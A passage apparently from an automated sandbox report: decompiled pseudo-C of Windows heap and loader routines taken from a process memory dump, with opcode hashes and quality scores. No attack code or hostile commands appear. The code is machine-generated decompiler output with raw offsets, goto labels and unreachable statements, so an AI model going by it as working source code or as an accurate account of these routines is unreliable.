                                          								goto L12;
                                          							}
                                          							_t82 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          							if(_t82 != 0) {
                                          								_t46 = _t78 + 0xc; // 0xc
                                          								_t69 = _t46;
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t85 =  *_t69;
                                          								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          									L20:
                                          									_t82 = 3;
                                          									asm("int 0x29");
                                          								}
                                          								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                          								 *_t82 = _t85;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                          								 *_t69 = _t82;
                                          								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                          								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                          								goto L11;
                                          							} else {
                                          								L18:
                                          								_push(0xe);
                                          								_pop(0);
                                          							}
                                          						} else {
                                          							_t84 = _v8;
                                          							_t9 = _t87 + 2; // 0x2
                                          							_t56 = _t9;
                                          							goto L4;
                                          						}
                                          					}
                                          					L12:
                                          					return 0;
                                          				}
                                          				_t10 = _t87 + 0x1a; // 0x1a
                                          				_t78 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                          				if(_t78 == 0) {
                                          					goto L18;
                                          				} else {
                                          					_t12 = _t87 + 2; // 0x2
                                          					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                          					_t16 = _t78 + 0x18; // 0x18
                                          					E00F5F3E0(_t16, _v8[2], _t87);
                                          					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                          					_t19 = _t78 + 0xc; // 0xc
                                          					_t66 = _t19;
                                          					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                          					 *_t66 = _t66;
                                          					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                          					_t81 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          					if(_t81 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t26 = _t78 + 0xc; // 0xc
                                          						_t69 = _t26;
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t85 =  *_t69;
                                          						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          							goto L20;
                                          						} else {
                                          							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                          							 *_t81 = _t85;
                                          							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                          							 *_t69 = _t81;
                                          							_t83 = _v12;
                                          							 *(_t78 + 8) = 1;
                                          							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							_t34 = _t83 + 0x154; // 0x1ba
                                          							_t69 = _t34;
                                          							_t85 =  *_t69;
                                          							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          								goto L20;
                                          							} else {
                                          								 *_t78 = _t85;
                                          								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                          								 *_t69 = _t78;
                                          								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							}
                                          						}
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L12;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: e9382f962d6118a7c9eaf8ce229dd29d7d9607a4f22adc04241c16173f8c6d3c
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: F851AA71A00746EFCB15DF15C881A92BBB5FF45314F18C0BAE9089F212E371E946DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E00F42990() {
                                          				signed int* _t62;
                                          				signed int _t64;
                                          				intOrPtr _t66;
                                          				signed short* _t69;
                                          				intOrPtr _t76;
                                          				signed short* _t79;
                                          				void* _t81;
                                          				signed int _t82;
                                          				signed short* _t83;
                                          				signed int _t87;
                                          				intOrPtr _t91;
                                          				void* _t98;
                                          				signed int _t99;
                                          				void* _t101;
                                          				signed int* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          				void* _t107;
                                          
                                          				_push(0x20);
                                          				_push(0xfeff00);
                                          				E00F6D08C(_t81, _t98, _t101);
                                          				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                          				_t99 = 0;
                                          				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                          				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                          				if(_t82 == 0) {
                                          					_t62 = 0xc0000100;
                                          				} else {
                                          					 *((intOrPtr*)(_t103 - 4)) = 0;
                                          					_t102 = 0xc0000100;
                                          					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                          					_t64 = 4;
                                          					while(1) {
                                          						 *(_t103 - 0x24) = _t64;
                                          						if(_t64 == 0) {
                                          							break;
                                          						}
                                          						_t87 = _t64 * 0xc;
                                          						 *(_t103 - 0x2c) = _t87;
                                          						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xef1664));
                                          						if(_t107 <= 0) {
                                          							if(_t107 == 0) {
                                          								_t79 = E00F5E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xef1668)), _t82);
                                          								_t104 = _t104 + 0xc;
                                          								__eflags = _t79;
                                          								if(__eflags == 0) {
                                          									_t102 = E00F951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xef166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                          									break;
                                          								} else {
                                          									_t64 =  *(_t103 - 0x24);
                                          									goto L5;
                                          								}
                                          								goto L13;
                                          							} else {
                                          								L5:
                                          								_t64 = _t64 - 1;
                                          								continue;
                                          							}
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          					__eflags = _t102;
                                          					if(_t102 < 0) {
                                          						__eflags = _t102 - 0xc0000100;
                                          						if(_t102 == 0xc0000100) {
                                          							_t83 =  *((intOrPtr*)(_t103 + 8));
                                          							__eflags = _t83;
                                          							if(_t83 != 0) {
                                          								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                          								__eflags =  *_t83 - _t99;
                                          								if( *_t83 == _t99) {
                                          									_t102 = 0xc0000100;
                                          									goto L19;
                                          								} else {
                                          									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                          									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                          									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                          									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                          										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                          										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                          											L26:
                                          											_t102 = E00F42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          											__eflags = _t102 - 0xc0000100;
                                          											if(_t102 != 0xc0000100) {
                                          												goto L12;
                                          											} else {
                                          												_t99 = 1;
                                          												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                          												goto L18;
                                          											}
                                          										} else {
                                          											_t69 = E00F26600( *((intOrPtr*)(_t91 + 0x1c)));
                                          											__eflags = _t69;
                                          											if(_t69 != 0) {
                                          												goto L26;
                                          											} else {
                                          												_t83 =  *((intOrPtr*)(_t103 + 8));
                                          												goto L18;
                                          											}
                                          										}
                                          									} else {
                                          										L18:
                                          										_t102 = E00F42C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                          										L19:
                                          										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          										goto L12;
                                          									}
                                          								}
                                          								L28:
                                          							} else {
                                          								E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          								 *((intOrPtr*)(_t103 - 4)) = 1;
                                          								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                          								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                          								_t76 = E00F42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                          								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                          								__eflags = _t76 - 0xc0000100;
                                          								if(_t76 == 0xc0000100) {
                                          									 *((intOrPtr*)(_t103 - 0x1c)) = E00F42C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                          								}
                                          								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                          								E00F42ACB();
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                          					_t62 = _t102;
                                          				}
                                          				L13:
                                          				return E00F6D0D1(_t62);
                                          				goto L28;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ad8327eb85f8915b47354a3ea84477600ca731e016637ce2918e8990ab097ca
                                          • Instruction ID: 0e0b9fbcd058548772263d4b1b93ddf46744a48ff0b28a2120c87eb276708151
                                          • Opcode Fuzzy Hash: 6ad8327eb85f8915b47354a3ea84477600ca731e016637ce2918e8990ab097ca
                                          • Instruction Fuzzy Hash: E6513372A002199FCF65DF95C880ADEBBB5BB48720F558065FC14AB261C3399D92EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00F44D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				char _v176;
                                          				char _v177;
                                          				char _v184;
                                          				intOrPtr _v192;
                                          				intOrPtr _v196;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short _t42;
                                          				char* _t44;
                                          				intOrPtr _t46;
                                          				intOrPtr _t50;
                                          				char* _t57;
                                          				intOrPtr _t59;
                                          				intOrPtr _t67;
                                          				signed int _t69;
                                          
                                          				_t64 = __edx;
                                          				_v12 =  *0x100d360 ^ _t69;
                                          				_t65 = 0xa0;
                                          				_v196 = __edx;
                                          				_v177 = 0;
                                          				_t67 = __ecx;
                                          				_v192 = __ecx;
                                          				E00F5FA60( &_v176, 0, 0xa0);
                                          				_t57 =  &_v176;
                                          				_t59 = 0xa0;
                                          				if( *0x1007bc8 != 0) {
                                          					L3:
                                          					while(1) {
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t67 = _v192;
                                          						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                          						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                          						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                          						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                          						_push( &_v184);
                                          						_push(_t59);
                                          						_push(_t57);
                                          						_push(0xa0);
                                          						_push(_t57);
                                          						_push(0xf);
                                          						_t42 = E00F5B0B0();
                                          						if(_t42 != 0xc0000023) {
                                          							break;
                                          						}
                                          						if(_v177 != 0) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          						}
                                          						_v177 = 1;
                                          						_t44 = L00F34620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                          						_t59 = _v184;
                                          						_t57 = _t44;
                                          						if(_t57 != 0) {
                                          							continue;
                                          						} else {
                                          							_t42 = 0xc0000017;
                                          							break;
                                          						}
                                          					}
                                          					if(_t42 != 0) {
                                          						_t65 = E00F1CCC0(_t42);
                                          						if(_t65 != 0) {
                                          							L10:
                                          							if(_v177 != 0) {
                                          								if(_t57 != 0) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          								}
                                          							}
                                          							_t46 = _t65;
                                          							L12:
                                          							return E00F5B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                          						}
                                          						L7:
                                          						_t50 = _a4;
                                          						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                          						if(_t50 != 3) {
                                          							if(_t50 == 2) {
                                          								goto L8;
                                          							}
                                          							L9:
                                          							if(E00F5F380(_t67 + 0xc, 0xef5138, 0x10) == 0) {
                                          								 *0x10060d8 = _t67;
                                          							}
                                          							goto L10;
                                          						}
                                          						L8:
                                          						_t64 = _t57 + 0x28;
                                          						E00F44F49(_t67, _t57 + 0x28);
                                          						goto L9;
                                          					}
                                          					_t65 = 0;
                                          					goto L7;
                                          				}
                                          				if(E00F44E70(0x10086b0, 0xf45690, 0, 0) != 0) {
                                          					_t46 = E00F1CCC0(_t56);
                                          					goto L12;
                                          				} else {
                                          					_t59 = 0xa0;
                                          					goto L3;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
                                          • Instruction ID: 41399f129f5b944dbe635d5e90913736807b869e80d446c88d427692caecf585
                                          • Opcode Fuzzy Hash: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
                                          • Instruction Fuzzy Hash: 0F41B371A407189FEB31DF14CC81FAABBA9FB45720F004099ED45A7281D775ED44EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E00F44BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                          				signed int _v8;
                                          				short _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v156;
                                          				short _v158;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				intOrPtr _v168;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t45;
                                          				intOrPtr _t74;
                                          				signed char _t77;
                                          				intOrPtr _t84;
                                          				char* _t85;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          				signed short _t88;
                                          				signed int _t89;
                                          
                                          				_t83 = __edx;
                                          				_v8 =  *0x100d360 ^ _t89;
                                          				_t45 = _a8 & 0x0000ffff;
                                          				_v158 = __edx;
                                          				_v168 = __ecx;
                                          				if(_t45 == 0) {
                                          					L22:
                                          					_t86 = 6;
                                          					L12:
                                          					E00F1CC50(_t86);
                                          					L11:
                                          					return E00F5B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                          				}
                                          				_t77 = _a4;
                                          				if((_t77 & 0x00000001) != 0) {
                                          					goto L22;
                                          				}
                                          				_t8 = _t77 + 0x34; // 0xdce0ba00
                                          				if(_t45 !=  *_t8) {
                                          					goto L22;
                                          				}
                                          				_t9 = _t77 + 0x24; // 0x1008504
                                          				E00F32280(_t9, _t9);
                                          				_t87 = 0x78;
                                          				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                          				E00F5FA60( &_v156, 0, _t87);
                                          				_t13 = _t77 + 0x30; // 0x3db8
                                          				_t85 =  &_v156;
                                          				_v36 =  *_t13;
                                          				_v28 = _v168;
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				_v20 = _v158;
                                          				_v160 = 0;
                                          				while(1) {
                                          					_push( &_v164);
                                          					_push(_t87);
                                          					_push(_t85);
                                          					_push(0x18);
                                          					_push( &_v36);
                                          					_push(0x1e);
                                          					_t88 = E00F5B0B0();
                                          					if(_t88 != 0xc0000023) {
                                          						break;
                                          					}
                                          					if(_t85 !=  &_v156) {
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                          					}
                                          					_t84 = L00F34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                          					_v168 = _v164;
                                          					if(_t84 == 0) {
                                          						_t88 = 0xc0000017;
                                          						goto L19;
                                          					} else {
                                          						_t74 = _v160 + 1;
                                          						_v160 = _t74;
                                          						if(_t74 >= 0x10) {
                                          							L19:
                                          							_t86 = E00F1CCC0(_t88);
                                          							if(_t86 != 0) {
                                          								L8:
                                          								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                          								_t30 = _t77 + 0x24; // 0x1008504
                                          								E00F2FFB0(_t77, _t84, _t30);
                                          								if(_t84 != 0 && _t84 !=  &_v156) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                          								}
                                          								if(_t86 != 0) {
                                          									goto L12;
                                          								} else {
                                          									goto L11;
                                          								}
                                          							}
                                          							L6:
                                          							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                          							if(_v164 != 0) {
                                          								_t83 = _t84;
                                          								E00F44F49(_t77, _t84);
                                          							}
                                          							goto L8;
                                          						}
                                          						_t87 = _v168;
                                          						continue;
                                          					}
                                          				}
                                          				if(_t88 != 0) {
                                          					goto L19;
                                          				}
                                          				goto L6;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b99db5b1df3277c294636a9d0392d6d94f6bd7328a7b1dbfd59674539c7b34da
                                          • Instruction ID: be46b3628a560c7ad5ddaea5588bcf6029533382946041b156eebdb4d296d23f
                                          • Opcode Fuzzy Hash: b99db5b1df3277c294636a9d0392d6d94f6bd7328a7b1dbfd59674539c7b34da
                                          • Instruction Fuzzy Hash: 1541A535E412289BCB21EF64CD81BEE77B4AF45710F0500A5E908EB241DB78EE84DBD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E00F28A0A(intOrPtr* __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				char _v524;
                                          				signed int _v528;
                                          				void* _v532;
                                          				char _v536;
                                          				char _v540;
                                          				char _v544;
                                          				intOrPtr* _v548;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t44;
                                          				void* _t46;
                                          				void* _t48;
                                          				signed int _t53;
                                          				signed int _t55;
                                          				intOrPtr* _t62;
                                          				void* _t63;
                                          				unsigned int _t75;
                                          				signed int _t79;
                                          				unsigned int _t81;
                                          				unsigned int _t83;
                                          				signed int _t84;
                                          				void* _t87;
                                          
                                          				_t76 = __edx;
                                          				_v8 =  *0x100d360 ^ _t84;
                                          				_v536 = 0x200;
                                          				_t79 = 0;
                                          				_v548 = __edx;
                                          				_v544 = 0;
                                          				_t62 = __ecx;
                                          				_v540 = 0;
                                          				_v532 =  &_v524;
                                          				if(__edx == 0 || __ecx == 0) {
                                          					L6:
                                          					return E00F5B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                          				} else {
                                          					_v528 = 0;
                                          					E00F2E9C0(1, __ecx, 0, 0,  &_v528);
                                          					_t44 = _v528;
                                          					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                          					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                          					_t46 = 0xa;
                                          					_t87 = _t81 - _t46;
                                          					if(_t87 > 0 || _t87 == 0) {
                                          						 *_v548 = 0xef1180;
                                          						L5:
                                          						_t79 = 1;
                                          						goto L6;
                                          					} else {
                                          						_t48 = E00F41DB5(_t62,  &_v532,  &_v536);
                                          						_t76 = _v528;
                                          						if(_t48 == 0) {
                                          							L9:
                                          							E00F53C2A(_t81, _t76,  &_v544);
                                          							 *_v548 = _v544;
                                          							goto L5;
                                          						}
                                          						_t62 = _v532;
                                          						if(_t62 != 0) {
                                          							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                          							_t53 =  *_t62;
                                          							_v528 = _t53;
                                          							if(_t53 != 0) {
                                          								_t63 = _t62 + 4;
                                          								_t55 = _v528;
                                          								do {
                                          									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                          										if(E00F28999(_t63,  &_v540) == 0) {
                                          											_t55 = _v528;
                                          										} else {
                                          											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                          											_t55 = _v528;
                                          											if(_t75 >= _t83) {
                                          												_t83 = _t75;
                                          											}
                                          										}
                                          									}
                                          									_t63 = _t63 + 0x14;
                                          									_t55 = _t55 - 1;
                                          									_v528 = _t55;
                                          								} while (_t55 != 0);
                                          								_t62 = _v532;
                                          							}
                                          							if(_t62 !=  &_v524) {
                                          								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                          							}
                                          							_t76 = _t83 & 0x0000ffff;
                                          							_t81 = _t83 >> 0x10;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
                                          • Instruction ID: e9dfb4a1c9b447accd59b412055e17c8be5a365a6faca50a011f291d3d8711a6
                                          • Opcode Fuzzy Hash: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
                                          • Instruction Fuzzy Hash: FC418FB1A0123C9BDB24CF55DC88BA9B7F4FB94350F1041EAE80997242EB749E81DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00FDFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t29;
                                          				char* _t32;
                                          				char* _t43;
                                          				signed int _t80;
                                          				signed int* _t84;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t56 = __edx;
                                          				_t84 = __ecx;
                                          				_t80 = E00FDFD4E(__ecx, __edx);
                                          				_v12 = _t80;
                                          				if(_t80 != 0) {
                                          					_t29 =  *__ecx & _t80;
                                          					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                          					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                          						E00FE0A13(__ecx, _t80, 0, _a4);
                                          						_t80 = 1;
                                          						if(E00F37D50() == 0) {
                                          							_t32 = 0x7ffe0380;
                                          						} else {
                                          							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          							_push(3);
                                          							L21:
                                          							E00FD1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                          						}
                                          						goto L22;
                                          					}
                                          					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                          						_t80 = E00FE2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                          						if(_t80 != 0) {
                                          							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                          							_t77 = _v8;
                                          							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                          								E00FDC8F7(_t66, _t77, 0);
                                          							}
                                          						}
                                          					} else {
                                          						_t80 = E00FDDBD2(__ecx[0xb], _t74, __edx, _a4);
                                          					}
                                          					if(E00F37D50() == 0) {
                                          						_t43 = 0x7ffe0380;
                                          					} else {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                          						goto L22;
                                          					} else {
                                          						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                          						goto L21;
                                          					}
                                          				} else {
                                          					_push(__ecx);
                                          					_push(_t80);
                                          					E00FDA80D(__ecx[0xf], 9, __edx, _t80);
                                          					L22:
                                          					return _t80;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: c74d26e0c9983694543b2e08ab53e4edf37bffbb0e83a1311baae7b7ba119feb
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 943105326006446FD3229768CC45F6A77ABEBC5760F1C416AF8478B392DA74DC45F710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00FDEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* _v15;
                                          				char _v16;
                                          				void* _v19;
                                          				void* _v28;
                                          				intOrPtr _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t26;
                                          				signed int _t27;
                                          				char* _t40;
                                          				unsigned int* _t50;
                                          				intOrPtr* _t58;
                                          				unsigned int _t59;
                                          				char _t75;
                                          				signed int _t86;
                                          				intOrPtr _t88;
                                          				intOrPtr* _t91;
                                          
                                          				_t75 = __edx;
                                          				_t91 = __ecx;
                                          				_v12 = __edx;
                                          				_t50 = __ecx + 0x30;
                                          				_t86 = _a4 & 0x00000001;
                                          				if(_t86 == 0) {
                                          					E00F32280(_t26, _t50);
                                          					_t75 = _v16;
                                          				}
                                          				_t58 = _t91;
                                          				_t27 = E00FDE815(_t58, _t75);
                                          				_v8 = _t27;
                                          				if(_t27 != 0) {
                                          					E00F1F900(_t91 + 0x34, _t27);
                                          					if(_t86 == 0) {
                                          						E00F2FFB0(_t50, _t86, _t50);
                                          					}
                                          					_t59 =  *(_v8 + 0x10);
                                          					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                          					_t11 = _t53 - 1; // 0x0
                                          					_t12 = _t53 - 1; // 0x0
                                          					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                          					E00FDAFDE( &_v12,  &_v16, 0x8000,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					E00FDBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                          					_t55 = _v36;
                                          					_t88 = _v36;
                                          					if(E00F37D50() == 0) {
                                          						_t40 = 0x7ffe0388;
                                          					} else {
                                          						_t55 = _v16;
                                          						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t40 != 0) {
                                          						E00FCFE3F(_t55, _t91, _v12, _t55);
                                          					}
                                          				} else {
                                          					if(_t86 == 0) {
                                          						E00F2FFB0(_t50, _t86, _t50);
                                          						_t75 = _v16;
                                          					}
                                          					_push(_t58);
                                          					_t88 = 0;
                                          					_push(0);
                                          					E00FDA80D(_t91, 8, _t75, 0);
                                          				}
                                          				return _t88;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 2234023348986fa2413492c55c63656111688036122daff3f259a6f0900a2596
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: B431B4726047059BC719EF24CC81A5BB7AAFFC4320F08492EF5568B741DE38E819D795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00F969A6(signed short* __ecx, void* __eflags) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				signed short _v28;
